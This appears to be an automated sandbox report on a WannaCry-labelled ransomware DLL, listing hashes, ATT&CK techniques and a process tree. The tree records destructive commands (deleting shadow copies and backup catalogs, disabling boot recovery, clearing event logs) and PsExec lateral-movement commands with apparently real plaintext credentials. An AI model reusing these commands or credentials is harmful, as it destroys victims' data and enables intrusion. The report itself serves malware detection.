wannacry | edd1fbcf42000838a7cb6bc32d4f41d8c2f894c0e749f0239b238d0432d0bf92

Analysis

max time kernel
170s
max time network
205s
platform
windows10_x64
resource
win10v20201028
submitted
26-12-2020 20:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

WannaCry/Trojan-Ransom.Win32.Wanna.m.1d6958990c8c4f5b9b93efa692b84937.dll
Size

5.0MB
MD5

1d6958990c8c4f5b9b93efa692b84937
SHA1

58bc6052ee6a13dc4711ca73df029a694f6e7239
SHA256

716954bdf4ef6882a71c8f2aa3981190da7777b50a3988069bb68eed17c7ddc8
SHA512

cb1445e197763d3ae28e8b7186a5f57cd8f34cbcba7c627d7004eb6dddbca67526ae721aff62d26c21b3585c0caef698b236194c90619c970099a5eced8d2682

Score

10^/10

wannacry evasion ransomware worm

Malware Config

Signatures

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Clears Windows event logs 1 TTPs
evasion ransomware

Indicator Removal on Host
T1070
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

3808 bcdedit.exe
2052 bcdedit.exe
Deletes backup catalog 3 TTPs 1 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command-Line Interface
T1059

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

wbadmin.exe

pid process

1764 wbadmin.exe

pid	process
3808	bcdedit.exe
2052	bcdedit.exe

pid	process
1764	wbadmin.exe

Executes dropped EXE 21 IoCs

Processes:

mssecsvc.exemssecsvc.exetasksche.exeopgpz.exe_osc.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe

pid	process
2424	mssecsvc.exe
3164	mssecsvc.exe
748	tasksche.exe
3820	opgpz.exe
2828	_osc.exe
204	_yjl.exe
1772	_yjl.exe
2652	_yjl.exe
248	_yjl.exe
264	_yjl.exe
272	_yjl.exe
3688	_yjl.exe
1104	_yjl.exe
2736	_yjl.exe
3260	_yjl.exe
3744	_yjl.exe
3512	_yjl.exe
2984	_yjl.exe
1684	_yjl.exe
1728	_yjl.exe
1568	_yjl.exe

Drops file in System32 directory 7 IoCs

Processes:

mssecsvc.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	mssecsvc.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\D2AYU1VM.cookie	mssecsvc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\D2AYU1VM.cookie	mssecsvc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	mssecsvc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	mssecsvc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	mssecsvc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	mssecsvc.exe

Drops file in Windows directory 2 IoCs

Processes:

rundll32.exemssecsvc.exe

description ioc process

File created C:\WINDOWS\mssecsvc.exe rundll32.exe
File created C:\WINDOWS\tasksche.exe mssecsvc.exe

description	ioc	process
File created	C:\WINDOWS\mssecsvc.exe	rundll32.exe
File created	C:\WINDOWS\tasksche.exe	mssecsvc.exe

Checks SCSI registry key(s) 3 TTPs 4 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

vds.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName	vds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName	vds.exe

Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

2540 vssadmin.exe

pid	process
2540	vssadmin.exe

Modifies data under HKEY_USERS 42 IoCs

Processes:

_yjl.exemssecsvc.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_yjl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	mssecsvc.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_yjl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_yjl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_yjl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_yjl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_yjl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_yjl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_yjl.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	mssecsvc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	mssecsvc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals	_yjl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_yjl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_yjl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_yjl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_yjl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_yjl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_yjl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	mssecsvc.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	mssecsvc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_yjl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_yjl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_yjl.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	mssecsvc.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_yjl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_yjl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_yjl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_yjl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_yjl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	_yjl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_yjl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_yjl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_yjl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	mssecsvc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_yjl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_yjl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	mssecsvc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_yjl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_yjl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_yjl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_yjl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_yjl.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

opgpz.exe

pid process

3820 opgpz.exe
3820 opgpz.exe
3820 opgpz.exe
3820 opgpz.exe
3820 opgpz.exe
3820 opgpz.exe

pid	process
3820	opgpz.exe
3820	opgpz.exe
3820	opgpz.exe
3820	opgpz.exe
3820	opgpz.exe
3820	opgpz.exe

Suspicious use of AdjustPrivilegeToken 24 IoCs

Processes:

_ftf.exeopgpz.exe_osc.exevssvc.exewbengine.exewevtutil.exewevtutil.exe

description	pid	process
Token: SeAssignPrimaryTokenPrivilege	504	_ftf.exe
Token: SeIncreaseQuotaPrivilege	504	_ftf.exe
Token: SeSecurityPrivilege	504	_ftf.exe
Token: SeTakeOwnershipPrivilege	504	_ftf.exe
Token: SeLoadDriverPrivilege	504	_ftf.exe
Token: SeSystemtimePrivilege	504	_ftf.exe
Token: SeBackupPrivilege	504	_ftf.exe
Token: SeRestorePrivilege	504	_ftf.exe
Token: SeShutdownPrivilege	504	_ftf.exe
Token: SeSystemEnvironmentPrivilege	504	_ftf.exe
Token: SeUndockPrivilege	504	_ftf.exe
Token: SeManageVolumePrivilege	504	_ftf.exe
Token: SeDebugPrivilege	3820	opgpz.exe
Token: SeShutdownPrivilege	2828	_osc.exe
Token: SeBackupPrivilege	1108	vssvc.exe
Token: SeRestorePrivilege	1108	vssvc.exe
Token: SeAuditPrivilege	1108	vssvc.exe
Token: SeBackupPrivilege	2556	wbengine.exe
Token: SeRestorePrivilege	2556	wbengine.exe
Token: SeSecurityPrivilege	2556	wbengine.exe
Token: SeSecurityPrivilege	3824	wevtutil.exe
Token: SeBackupPrivilege	3824	wevtutil.exe
Token: SeSecurityPrivilege	2436	wevtutil.exe
Token: SeBackupPrivilege	2436	wevtutil.exe

Suspicious use of WriteProcessMemory 84 IoCs

Processes:

rundll32.exerundll32.exePSEXESVC.exe_ftf.exe_osc.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 368 wrote to memory of 1468	368	rundll32.exe	rundll32.exe
PID 368 wrote to memory of 1468	368	rundll32.exe	rundll32.exe
PID 368 wrote to memory of 1468	368	rundll32.exe	rundll32.exe
PID 1468 wrote to memory of 2424	1468	rundll32.exe	mssecsvc.exe
PID 1468 wrote to memory of 2424	1468	rundll32.exe	mssecsvc.exe
PID 1468 wrote to memory of 2424	1468	rundll32.exe	mssecsvc.exe
PID 4056 wrote to memory of 504	4056	PSEXESVC.exe	_ftf.exe
PID 4056 wrote to memory of 504	4056	PSEXESVC.exe	_ftf.exe
PID 4056 wrote to memory of 504	4056	PSEXESVC.exe	_ftf.exe
PID 504 wrote to memory of 3820	504	_ftf.exe	opgpz.exe
PID 504 wrote to memory of 3820	504	_ftf.exe	opgpz.exe
PID 504 wrote to memory of 2828	504	_ftf.exe	_osc.exe
PID 504 wrote to memory of 2828	504	_ftf.exe	_osc.exe
PID 504 wrote to memory of 2828	504	_ftf.exe	_osc.exe
PID 2828 wrote to memory of 2308	2828	_osc.exe	cmd.exe
PID 2828 wrote to memory of 2308	2828	_osc.exe	cmd.exe
PID 2308 wrote to memory of 2540	2308	cmd.exe	vssadmin.exe
PID 2308 wrote to memory of 2540	2308	cmd.exe	vssadmin.exe
PID 2828 wrote to memory of 1684	2828	_osc.exe	cmd.exe
PID 2828 wrote to memory of 1684	2828	_osc.exe	cmd.exe
PID 1684 wrote to memory of 1764	1684	cmd.exe	wbadmin.exe
PID 1684 wrote to memory of 1764	1684	cmd.exe	wbadmin.exe
PID 2828 wrote to memory of 912	2828	_osc.exe	cmd.exe
PID 2828 wrote to memory of 912	2828	_osc.exe	cmd.exe
PID 912 wrote to memory of 3808	912	cmd.exe	bcdedit.exe
PID 912 wrote to memory of 3808	912	cmd.exe	bcdedit.exe
PID 912 wrote to memory of 2052	912	cmd.exe	bcdedit.exe
PID 912 wrote to memory of 2052	912	cmd.exe	bcdedit.exe
PID 2828 wrote to memory of 2736	2828	_osc.exe	cmd.exe
PID 2828 wrote to memory of 2736	2828	_osc.exe	cmd.exe
PID 2736 wrote to memory of 3824	2736	cmd.exe	wevtutil.exe
PID 2736 wrote to memory of 3824	2736	cmd.exe	wevtutil.exe
PID 504 wrote to memory of 204	504	_ftf.exe	_yjl.exe
PID 504 wrote to memory of 204	504	_ftf.exe	_yjl.exe
PID 504 wrote to memory of 204	504	_ftf.exe	_yjl.exe
PID 2828 wrote to memory of 260	2828	_osc.exe	cmd.exe
PID 2828 wrote to memory of 260	2828	_osc.exe	cmd.exe
PID 260 wrote to memory of 2436	260	cmd.exe	wevtutil.exe
PID 260 wrote to memory of 2436	260	cmd.exe	wevtutil.exe
PID 504 wrote to memory of 1772	504	_ftf.exe	_yjl.exe
PID 504 wrote to memory of 1772	504	_ftf.exe	_yjl.exe
PID 504 wrote to memory of 1772	504	_ftf.exe	_yjl.exe
PID 504 wrote to memory of 2652	504	_ftf.exe	_yjl.exe
PID 504 wrote to memory of 2652	504	_ftf.exe	_yjl.exe
PID 504 wrote to memory of 2652	504	_ftf.exe	_yjl.exe
PID 504 wrote to memory of 248	504	_ftf.exe	_yjl.exe
PID 504 wrote to memory of 248	504	_ftf.exe	_yjl.exe
PID 504 wrote to memory of 248	504	_ftf.exe	_yjl.exe
PID 504 wrote to memory of 264	504	_ftf.exe	_yjl.exe
PID 504 wrote to memory of 264	504	_ftf.exe	_yjl.exe
PID 504 wrote to memory of 264	504	_ftf.exe	_yjl.exe
PID 504 wrote to memory of 272	504	_ftf.exe	_yjl.exe
PID 504 wrote to memory of 272	504	_ftf.exe	_yjl.exe
PID 504 wrote to memory of 272	504	_ftf.exe	_yjl.exe
PID 504 wrote to memory of 3688	504	_ftf.exe	_yjl.exe
PID 504 wrote to memory of 3688	504	_ftf.exe	_yjl.exe
PID 504 wrote to memory of 3688	504	_ftf.exe	_yjl.exe
PID 504 wrote to memory of 1104	504	_ftf.exe	_yjl.exe
PID 504 wrote to memory of 1104	504	_ftf.exe	_yjl.exe
PID 504 wrote to memory of 1104	504	_ftf.exe	_yjl.exe
PID 504 wrote to memory of 2736	504	_ftf.exe	_yjl.exe
PID 504 wrote to memory of 2736	504	_ftf.exe	_yjl.exe
PID 504 wrote to memory of 2736	504	_ftf.exe	_yjl.exe
PID 504 wrote to memory of 3260	504	_ftf.exe	_yjl.exe

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\WannaCry\Trojan-Ransom.Win32.Wanna.m.1d6958990c8c4f5b9b93efa692b84937.dll,#1
1⤵
- Suspicious use of WriteProcessMemory
PID:368

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\WannaCry\Trojan-Ransom.Win32.Wanna.m.1d6958990c8c4f5b9b93efa692b84937.dll,#1
2⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1468

C:\WINDOWS\mssecsvc.exe
C:\WINDOWS\mssecsvc.exe
3⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:2424

C:\WINDOWS\tasksche.exe
C:\WINDOWS\tasksche.exe /i
4⤵
- Executes dropped EXE
PID:748

C:\WINDOWS\mssecsvc.exe
C:\WINDOWS\mssecsvc.exe -m security
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3164

C:\Windows\PSEXESVC.exe
C:\Windows\PSEXESVC.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:4056

C:\Windows\_ftf.exe
"_ftf.exe"
2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:504

C:\Windows\TEMP\opgpz.exe
123 \\.\pipe\2ECF9763-3A70-403C-A20C-21B1D7EF93D7
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3820

C:\Windows\TEMP\_osc.exe
"C:\Windows\TEMP\_osc.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2828

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
4⤵
- Suspicious use of WriteProcessMemory
PID:2308

\??\c:\Windows\system32\vssadmin.exe
c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
5⤵
- Interacts with shadow copies
PID:2540

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wbadmin.exe delete catalog -quiet
4⤵
- Suspicious use of WriteProcessMemory
PID:1684

C:\Windows\system32\wbadmin.exe
wbadmin.exe delete catalog -quiet
5⤵
- Deletes backup catalog
PID:1764

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
4⤵
- Suspicious use of WriteProcessMemory
PID:912

C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
5⤵
- Modifies boot configuration data using bcdedit
PID:3808

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
5⤵
- Modifies boot configuration data using bcdedit
PID:2052

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wevtutil.exe cl System
4⤵
- Suspicious use of WriteProcessMemory
PID:2736

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl System
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3824

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wevtutil.exe cl Security
4⤵
- Suspicious use of WriteProcessMemory
PID:260

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl Security
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2436

C:\Windows\TEMP\_yjl.exe
C:\Windows\TEMP\_yjl.exe \\255.255.255.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_dus.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:204

C:\Windows\TEMP\_yjl.exe
C:\Windows\TEMP\_yjl.exe \\255.255.255.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_dus.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1772

C:\Windows\TEMP\_yjl.exe
C:\Windows\TEMP\_yjl.exe \\255.255.255.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_dus.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2652

C:\Windows\TEMP\_yjl.exe
C:\Windows\TEMP\_yjl.exe \\255.255.255.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_dus.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:248

C:\Windows\TEMP\_yjl.exe
C:\Windows\TEMP\_yjl.exe \\255.255.255.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_dus.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:264

C:\Windows\TEMP\_yjl.exe
C:\Windows\TEMP\_yjl.exe \\255.255.255.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_dus.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:272

C:\Windows\TEMP\_yjl.exe
C:\Windows\TEMP\_yjl.exe \\255.255.255.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_dus.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:3688

C:\Windows\TEMP\_yjl.exe
C:\Windows\TEMP\_yjl.exe \\255.255.255.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_dus.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1104

C:\Windows\TEMP\_yjl.exe
C:\Windows\TEMP\_yjl.exe \\255.255.255.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_dus.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2736

C:\Windows\TEMP\_yjl.exe
C:\Windows\TEMP\_yjl.exe \\255.255.255.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_dus.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:3260

C:\Windows\TEMP\_yjl.exe
C:\Windows\TEMP\_yjl.exe \\255.255.255.255 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_dus.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:3744

C:\Windows\TEMP\_yjl.exe
C:\Windows\TEMP\_yjl.exe \\255.255.255.255 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_dus.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:3512

C:\Windows\TEMP\_yjl.exe
C:\Windows\TEMP\_yjl.exe \\255.255.255.255 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_dus.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2984

C:\Windows\TEMP\_yjl.exe
C:\Windows\TEMP\_yjl.exe \\255.255.255.255 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_dus.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1684

C:\Windows\TEMP\_yjl.exe
C:\Windows\TEMP\_yjl.exe \\255.255.255.255 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_dus.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1728

C:\Windows\TEMP\_yjl.exe
C:\Windows\TEMP\_yjl.exe \\255.255.255.255 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_dus.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1568

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1108

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2556

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:1676

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
- Checks SCSI registry key(s)
PID:644

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal on Host

T1070

File Deletion

T1107

Credential Access

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\WINDOWS\mssecsvc.exe
MD5
53e887584f552941244d293433ed9f30

SHA1
2ade4566b4f94569c4730e53eda170afe4b2313a

SHA256
0379e691ec21cc03c53cc73f1ad77414bf0ea84697aeee642d93399dbc378bf1

SHA512
c83a3cf8009ec42ca54b3c2be97833287fd8380452d5a6038d246da5266da7710f09396e50eb7872381bcd954860fab73704825fa6318fc75a8ceefbacf0d9d0

Download Submit
C:\Windows\TEMP\_osc.exe
MD5
3c0d740347b0362331c882c2dee96dbf

SHA1
8350e06f52e5c660bb416b03edb6a5ddc50c3a59

SHA256
ae9a4e244a9b3c77d489dee8aeaf35a7c3ba31b210e76d81ef2e91790f052c85

SHA512
a701f94b9cdebce6eff2f82552ec7554bf10d99019f8bcd6871ebca804d7519bdcfa3806ac7c7d8e604c3259c61c58b905293fa641c092a8fca8245f91eb0f8f

Download Submit
C:\Windows\TEMP\_yjl.exe
MD5
27304b246c7d5b4e149124d5f93c5b01

SHA1
e50d9e3bd91908e13a26b3e23edeaf577fb3a095

SHA256
3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef

SHA512
bec172a2f92a95796199cfc83f544a78685b52a94061ce0ffb46b265070ee0bcc018c4f548f56018bf3ff1e74952811b2afb6df79ab8d09f1ec73c9477af636b

Download Submit
C:\Windows\TEMP\opgpz.exe
MD5
86d1a184850859a6a4d1c35982f3c40e

SHA1
4abde6ff4d7f30c60dc61e866c4a11a7eee5bef5

SHA256
eb766983a8a05ad16b15e356df43f4e00f36092b8c6effdff3a580c2de2bba8f

SHA512
e9c18e0a70af00119bef1c697f0a801e9942c4702046d7f20533ea33c987c37c2007066b13935c8df6e039628db885cad2338feb95490e27cdcdbd57a7d0cc1a

Download Submit
C:\Windows\Temp\_osc.exe
MD5
3c0d740347b0362331c882c2dee96dbf

SHA1
8350e06f52e5c660bb416b03edb6a5ddc50c3a59

SHA256
ae9a4e244a9b3c77d489dee8aeaf35a7c3ba31b210e76d81ef2e91790f052c85

SHA512
a701f94b9cdebce6eff2f82552ec7554bf10d99019f8bcd6871ebca804d7519bdcfa3806ac7c7d8e604c3259c61c58b905293fa641c092a8fca8245f91eb0f8f

Download Submit
C:\Windows\Temp\_yjl.exe
MD5
27304b246c7d5b4e149124d5f93c5b01

SHA1
e50d9e3bd91908e13a26b3e23edeaf577fb3a095

SHA256
3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef

SHA512
bec172a2f92a95796199cfc83f544a78685b52a94061ce0ffb46b265070ee0bcc018c4f548f56018bf3ff1e74952811b2afb6df79ab8d09f1ec73c9477af636b

Download Submit
C:\Windows\Temp\_yjl.exe
MD5
27304b246c7d5b4e149124d5f93c5b01

SHA1
e50d9e3bd91908e13a26b3e23edeaf577fb3a095

SHA256
3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef

SHA512
bec172a2f92a95796199cfc83f544a78685b52a94061ce0ffb46b265070ee0bcc018c4f548f56018bf3ff1e74952811b2afb6df79ab8d09f1ec73c9477af636b

Download Submit
C:\Windows\Temp\_yjl.exe
MD5
27304b246c7d5b4e149124d5f93c5b01

SHA1
e50d9e3bd91908e13a26b3e23edeaf577fb3a095

SHA256
3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef

SHA512
bec172a2f92a95796199cfc83f544a78685b52a94061ce0ffb46b265070ee0bcc018c4f548f56018bf3ff1e74952811b2afb6df79ab8d09f1ec73c9477af636b

Download Submit
C:\Windows\Temp\_yjl.exe
MD5
27304b246c7d5b4e149124d5f93c5b01

SHA1
e50d9e3bd91908e13a26b3e23edeaf577fb3a095

SHA256
3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef

SHA512
bec172a2f92a95796199cfc83f544a78685b52a94061ce0ffb46b265070ee0bcc018c4f548f56018bf3ff1e74952811b2afb6df79ab8d09f1ec73c9477af636b

Download Submit
C:\Windows\Temp\_yjl.exe
MD5
